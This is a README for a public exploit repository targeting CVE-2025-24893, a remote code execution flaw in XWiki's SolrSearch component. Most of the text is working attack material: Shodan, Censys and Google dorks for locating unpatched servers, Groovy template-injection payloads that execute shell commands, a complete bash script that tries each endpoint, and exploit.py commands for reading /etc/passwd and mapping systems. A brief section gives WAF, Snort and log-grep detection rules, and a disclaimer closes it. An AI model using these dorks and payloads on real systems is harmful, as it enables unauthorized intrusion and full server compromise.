来源

关联漏洞

描述

CVE-2025-24893 exploit 

介绍

# CVE-2025-24893 - XWiki Remote Code Execution via SolrSearch SSTI

## 📋 Vulnerability Overview

**CVE-2025-24893** is a critical remote code execution vulnerability in XWiki that allows unauthorized users to execute arbitrary code through Server-Side Template Injection (SSTI) in the SolrSearch component.

### 🎯 Technical Details

- **Vulnerability Type**: Server-Side Template Injection (SSTI) → Remote Code Execution (RCE)
- **CVSS v3.1 Score**: **9.8 CRITICAL**
- **Vector**: `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **Authentication Required**: None (Guest access sufficient)
- **Component**: SolrSearchMacros.xml (line 955)
- **Impact**: Full system compromise

### 📦 Affected Versions

- **XWiki 5.3** milestone2 → **15.10.10**
- **XWiki 16.0.0** → **16.4.0**

### 🔧 Fixed Versions

- ✅ **XWiki 15.10.11**
- ✅ **XWiki 16.4.1** 
- ✅ **XWiki 16.5.0RC1**

---

## 🔍 Reconnaissance & Target Discovery

### 🛰️ Shodan Dorks

```bash
# Basic XWiki detection
title:"XWiki" port:8080,80,443

# XWiki with version information
http.title:"XWiki" http.html:"XWiki Platform"

# Specific vulnerable versions
http.title:"XWiki" http.html:"15.10" -http.html:"15.10.11"
http.title:"XWiki" http.html:"16." -http.html:"16.4.1" -http.html:"16.5.0"

# XWiki installation pages
http.html:"XWiki.XWikiPreferences" port:8080,80,443

# XWiki REST API endpoints
http.html:"/rest/wikis/xwiki" port:8080,80,443

# SolrSearch specific detection
http.html:"SolrSearch" http.title:"XWiki"

# Combined search with country filtering
title:"XWiki" port:8080,80,443 country:"US"
title:"XWiki" port:8080,80,443 country:"DE"
title:"XWiki" port:8080,80,443 country:"FR"
```

### 🔎 Censys Search Queries

```bash
# Basic XWiki detection
services.http.response.html_title:"XWiki"

# Version-specific searches
services.http.response.body:"XWiki Platform 15.10" and not services.http.response.body:"15.10.11"
services.http.response.body:"XWiki Platform 16." and not services.http.response.body:"16.4.1"

# SolrSearch endpoint detection
services.http.response.body:"SolrSearch" and services.http.response.html_title:"XWiki"

# Combined with specific ports
services.port:8080 and services.http.response.html_title:"XWiki"
services.port:80 and services.http.response.html_title:"XWiki"
```

### 🌐 Google Dorks

```bash
# Basic XWiki detection
intitle:"XWiki" inurl:"/xwiki/bin/"

# Login pages (often reveal version)
intitle:"XWiki" inurl:"/xwiki/bin/login"

# Administration panels
intitle:"XWiki" inurl:"/xwiki/bin/admin"

# SolrSearch pages
inurl:"/xwiki/bin/view/Main/SolrSearch"

# Version disclosure
inurl:"/xwiki/bin/" "Platform 15.10" -"15.10.11"
inurl:"/xwiki/bin/" "Platform 16." -"16.4.1"

# Directory listings
intitle:"Index of" inurl:"/xwiki/"
```

---

## 🎯 Manual Proof of Concept (PoC)

### Step 1: Target Identification

First, verify you have an XWiki installation:

```bash
# Check if target is running XWiki
curl -s "http://target.com/xwiki/bin/view/Main/" | grep -i "xwiki"

# Check version (if accessible)
curl -s "http://target.com/xwiki/bin/view/XWiki/XWikiPreferences" | grep -o "Platform [0-9]\+\.[0-9]\+\.[0-9]\+"
```

### Step 2: Vulnerability Test (Official CVE Payload)

Use the official CVE-2025-24893 test payload:

```bash
# Base payload from CVE advisory
PAYLOAD='}}}{{{async async=false}}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}'

# URL encode the payload
ENCODED=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD', safe=''))")

# Test the vulnerability
curl -s "http://target.com/xwiki/bin/get/Main/SolrSearch?media=rss&text=$ENCODED" | grep -o "Hello from search text:42"
```

**Expected Result**: If vulnerable, you should see `"Hello from search text:42"` in the response.

### Step 3: Command Execution PoC

Once vulnerability is confirmed, test command execution:

```bash
# Simple command execution test
COMMAND="whoami"
PAYLOAD="}}}}{{{{async async=false}}}}{{{{groovy}}}}println(['$COMMAND'].execute().text){{{{/groovy}}}}{{{{/async}}}}"
ENCODED=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD', safe=''))")

# Execute the payload
curl -s "http://target.com/xwiki/bin/get/Main/SolrSearch?media=rss&text=$ENCODED"
```

### Step 4: Advanced Command Execution

For commands with arguments or complex operations:

```bash
# Command with arguments
COMMAND="ls -la"
PAYLOAD="}}}}{{{{async async=false}}}}{{{{groovy}}}}println(['/bin/sh', '-c', '$COMMAND'].execute().text){{{{/groovy}}}}{{{{/async}}}}"
ENCODED=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD', safe=''))")

curl -s "http://target.com/xwiki/bin/get/Main/SolrSearch?media=rss&text=$ENCODED"
```

### 🛠️ Manual Testing Script

Create a simple bash script for manual testing:

```bash
#!/bin/bash
# CVE-2025-24893 Manual PoC Script

TARGET="$1"
COMMAND="$2"

if [ -z "$TARGET" ] || [ -z "$COMMAND" ]; then
    echo "Usage: $0 <target_url> <command>"
    echo "Example: $0 http://xwiki.example.com 'whoami'"
    exit 1
fi

# Remove trailing slash
TARGET=$(echo "$TARGET" | sed 's/\/$//')

# Create payload
PAYLOAD="}}}}{{{{async async=false}}}}{{{{groovy}}}}println(['/bin/sh', '-c', '$COMMAND'].execute().text){{{{/groovy}}}}{{{{/async}}}}"

# URL encode
ENCODED=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD', safe=''))")

# Test multiple endpoints
ENDPOINTS=(
    "/xwiki/bin/get/Main/SolrSearch?media=rss&text="
    "/xwiki/bin/view/Main/SolrSearch?media=rss&text="
    "/xwiki/bin/get/XWiki/SolrSearch?media=rss&text="
    "/xwiki/bin/view/XWiki/SolrSearch?media=rss&text="
)

echo "[*] Testing CVE-2025-24893 on $TARGET"
echo "[*] Command: $COMMAND"
echo

for endpoint in "${ENDPOINTS[@]}"; do
    echo "[*] Trying endpoint: $endpoint"
    RESPONSE=$(curl -s "$TARGET$endpoint$ENCODED" 2>/dev/null)
    
    if [ $? -eq 0 ] && [ ! -z "$RESPONSE" ]; then
        echo "[+] Response received, checking for command output..."
        # Extract output (simplified parsing)
        echo "$RESPONSE" | grep -o "search on \[}}[^]]*" | sed 's/search on \[}}//' || echo "[-] No output detected"
    else
        echo "[-] No response or error"
    fi
    echo
done
```

---

## 🚀 Automated Tool Usage

### Installation

```bash
git clone https://github.com/ibrahmsql/CVE-2025-24893.git
cd CVE-2025-24893
```

### Basic Usage

```bash
# Test for vulnerability (recommended first step)
python3 exploit.py -u http://target.com --test

# Interactive shell
python3 exploit.py -u http://target.com

# Execute single command
python3 exploit.py -u http://target.com -c "whoami"

# Debug mode
python3 exploit.py -u http://target.com -c "id" --debug

# HTTPS without SSL verification
python3 exploit.py -u https://target.com --test --no-verify-ssl
```

### Advanced Examples

```bash
# System reconnaissance
python3 exploit.py -u http://target.com -c "uname -a"
python3 exploit.py -u http://target.com -c "cat /etc/passwd"
python3 exploit.py -u http://target.com -c "ps aux"

# Network information
python3 exploit.py -u http://target.com -c "ifconfig"
python3 exploit.py -u http://target.com -c "netstat -tulpn"

# File system exploration
python3 exploit.py -u http://target.com -c "find / -name '*.conf' 2>/dev/null"
python3 exploit.py -u http://target.com -c "ls -la /var/log/"
```

---

## 🔧 Vulnerable Endpoints

The vulnerability can be exploited through multiple endpoints:

```
/xwiki/bin/get/Main/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/view/Main/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/get/XWiki/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/view/XWiki/SolrSearch?media=rss&text=PAYLOAD
/xwiki/bin/view/Main/Search?media=rss&text=PAYLOAD
/xwiki/bin/view/XWiki/Search?media=rss&text=PAYLOAD
```

---

## 🛡️ Detection & Defense

### Detection Methods

1. **Web Application Firewall (WAF) Rules**:
   ```
   # Detect SSTI patterns
   SecRule ARGS "@detectSQLi" "id:1001,phase:2,block,msg:'SSTI Attack Detected'"
   SecRule ARGS "@contains {{{" "id:1002,phase:2,block,msg:'XWiki SSTI Pattern'"
   SecRule ARGS "@contains }}}" "id:1003,phase:2,block,msg:'XWiki SSTI Pattern'"
   SecRule ARGS "@contains groovy" "id:1004,phase:2,block,msg:'Groovy Injection'"
   ```

2. **Log Monitoring**:
   ```bash
   # Monitor for suspicious SolrSearch requests
   grep -i "SolrSearch.*groovy\|SolrSearch.*async\|SolrSearch.*execute" /var/log/apache2/access.log
   ```

3. **Network Detection**:
   ```bash
   # Snort rule for CVE-2025-24893
   alert tcp any any -> any 80 (msg:"CVE-2025-24893 XWiki SSTI"; content:"SolrSearch"; content:"groovy"; sid:1000001;)
   ```

### Mitigation

1. **Immediate**: Update XWiki to patched versions
2. **Temporary**: Disable SolrSearch or restrict access
3. **Long-term**: Implement input validation and WAF rules

---

## 📚 References

- **CVE-2025-24893**: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
- **XWiki Security Advisory**: https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j
- **JIRA Issue**: https://jira.xwiki.org/browse/XWIKI-22149
- **XWiki Official Site**: https://xwiki.org

---

## ⚠️ Disclaimer

**This tool is for educational and authorized security testing purposes only.**

- Only test systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The authors are not responsible for misuse of this information
- Use responsibly and ethically

---

## 👨‍💻 Author

- **Author**: ibrahimsql
- **GitHub**: https://github.com/ibrahmsql
- **Contact**: ibrahimsql@proton.me

---

## 📄 License

This project is released under the MIT License. See LICENSE file for details.

文件快照

 [4.0K]  /data/pocs/f99d545a9350954588664537c136bf46d188122e
├── [ 13K]  exploit.py
├── [ 11K]  manual_poc.sh
└── [9.4K]  README.md

0 directories, 3 files

备注